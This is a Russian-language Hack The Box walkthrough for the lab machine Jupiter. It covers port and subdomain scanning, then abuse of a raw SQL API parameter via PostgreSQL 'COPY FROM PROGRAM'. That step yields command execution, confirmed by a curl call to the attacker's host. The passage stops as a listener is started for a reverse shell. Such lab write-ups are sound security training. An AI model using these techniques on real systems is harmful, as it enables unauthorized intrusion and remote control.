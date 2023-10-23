В этой статье мы получим дос­туп к веб‑сер­веру через RCE-уяз­вимость и экс­плу­ата­цию SQL-инъ­екции в PostgreSQL. Затем вос­поль­зуем­ся фрей­мвор­ком Jupyter для выпол­нения про­изволь­ного кода и повысим при­виле­гии в SatTrack.

На­ша цель — зах­ват прав супер­поль­зовате­ля на тре­ниро­воч­ной машине Jupiter с пло­щад­ки Hack The Box. Уро­вень ее слож­ности — сред­ний.

warning Под­клю­чать­ся к машинам с HTB рекомен­дует­ся толь­ко через VPN. Не делай это­го с компь­юте­ров, где есть важ­ные для тебя дан­ные, так как ты ока­жешь­ся в общей сети с дру­гими учас­тни­ками.

Разведка

Сканирование портов

До­бав­ляем IP-адрес машины в / etc/ hosts :

10. 10. 11. 216 jupiter. htb

И запус­каем ска­ниро­вание пор­тов.

Справка: сканирование портов Ска­ниро­вание пор­тов — стан­дар­тный пер­вый шаг при любой ата­ке. Он поз­воля­ет ата­кующе­му узнать, какие служ­бы на хос­те при­нима­ют соеди­нение. На осно­ве этой информа­ции выбира­ется сле­дующий шаг к получе­нию точ­ки вхо­да. На­ибо­лее извес­тный инс­тру­мент для ска­ниро­вания — это Nmap. Улуч­шить резуль­таты его работы ты можешь при помощи сле­дующе­го скрип­та: #!/ bin/ bash ports = $( nmap -p- --min-rate = 500 $1 | grep ^[ 0- 9] | cut -d '/ ' -f 1 | tr '\ n' ', ' | sed s/, $/ / ) nmap -p $ports -A $1 Он дей­ству­ет в два эта­па. На пер­вом про­изво­дит­ся обыч­ное быс­трое ска­ниро­вание, на вто­ром — более тща­тель­ное ска­ниро­вание, с исполь­зовани­ем име­ющих­ся скрип­тов (опция -A ).

Ска­нер нашел два откры­тых пор­та:

порт 22 — служ­ба OpenSSH 8.9p1;

порт 80 — веб‑сер­вер Nginx 1.18.0.

При таком выборе начинать нуж­но с изу­чения сай­та.

Точка входа

На самом сай­те ничего инте­рес­ного не находим, поэто­му поп­робу­ем поис­кать под­домены.

Справка: сканирование веба c ffuf Од­но из пер­вых дей­ствий при тес­тирова­нии безопас­ности веб‑при­ложе­ния — это ска­ниро­вание методом перебо­ра катало­гов, что­бы най­ти скры­тую информа­цию и недос­тупные обыч­ным посети­телям фун­кции. Для это­го мож­но исполь­зовать прог­раммы вро­де dirsearch и DIRB. Я пред­почитаю лег­кий и очень быс­трый ffuf. При запус­ке ука­зыва­ем сле­дующие парамет­ры: -w — сло­варь (я исполь­зую сло­вари из набора SecLists);

— сло­варь (я исполь­зую сло­вари из набора SecLists); -t — количес­тво потоков;

— количес­тво потоков; -u — URL;

— URL; -H — HTTP-заголо­вок. Мес­то перебо­ра помеча­ется сло­вом FUZZ.

За­пус­каем ска­ниро­вание, перечис­лив все нуж­ные парамет­ры:

ffuf -u http:/ / jupiter. htb -w subdomains- top1million- 110000. txt -t 256 -H 'Host: FUZZ. jupiter. htb'

В вывод попада­ют абсо­лют­но все вари­анты из спис­ка, а зна­чит, будем исполь­зовать филь­тр -fs , что­бы убрать из вывода стра­ницы раз­мером 178 байт.

ffuf -u http:/ / jupiter. htb -w subdomains- top1million- 110000. txt -t 256 -H 'Host: FUZZ. jupiter. htb' -fs 178

На­ходим новый под­домен kiosk , который добав­ляем в файл / etc/ hosts . Обно­вив файл, прос­матри­ваем сайт.

10. 10. 11. 216 jupiter. htb kiosk. jupiter. htb

Все дей­ствия я про­изво­жу через Burp, поэто­му, про­верив Burp History, сра­зу обра­тил вни­мание на то, что исполь­зует­ся API и в парамет­ре rawSql переда­ется сле­дующий SQL-зап­рос:

select count ( parent ) from moons where parent = 'Saturn' ;

Это явная точ­ка вхо­да, поп­робу­ем вос­поль­зовать­ся ей.

Точка опоры

С точ­ки зре­ния пен­тесте­ра, Postgres хорош тем, что может дать выпол­нение команд в кон­тек­сте поль­зовате­ля‑служ­бы. Механизм прос­той: соз­даем таб­лицу и запол­няем ее выводом выпол­ненной коман­ды. С помощью Burp Repeater отправ­ляем SQL-зап­рос для соз­дания таб­лицы.

create table cmd_exec ( cmd_output text ) ;

Ни­каких оши­бок нам не вер­нули, поэто­му запус­каем локаль­ный веб‑сер­вер на осно­ве Python и выпол­няем на него тес­товый зап­рос с уда­лен­ного сер­вера при помощи curl.

copy cmd_exec from program 'curl http:// 10. 10. 14. 188/ test_rce' ;

По­луча­ется, у нас есть RCE, поэто­му запус­каем лис­тенер ( pwncat-cs -lp 4321 ) и проб­расыва­ем самый обыч­ный реверс‑шелл: